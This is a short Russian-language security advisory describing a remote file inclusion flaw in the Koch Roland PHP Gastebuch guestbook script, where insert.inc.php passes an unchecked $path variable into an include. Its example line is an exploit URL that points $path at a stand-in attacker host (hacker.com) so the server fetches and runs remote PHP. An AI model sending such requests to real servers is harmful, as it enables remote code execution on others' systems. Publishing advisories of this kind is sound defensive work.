Security Lab

Выполнение произвольного PHP кода в Koch Roland PHP Gastebuch

Дата публикации:20.11.2003
Дата изменения:17.10.2006
Всего просмотров:43566
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии:

Описание: Уязвимость обнаружена в Koch Roland PHP Gastebuch. Удаленный пользователь может выполнить произвольный PHP код, включая команды операционной системы, на целевом сервере.

Файл 'insert.inc.php'не проверяет данные, представленные пользователем в переменной $path. Удаленный пользователь может представить специально обработанное значение для переменной $path, чтобы выполнить произвольный PHP код на удаленном сервере.

Пример/Эксплоит:

http://[target]/rolis_book_path/insert.inc.php?path=http://hacker.com/

URL производителя: http://www.roli.at

Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время.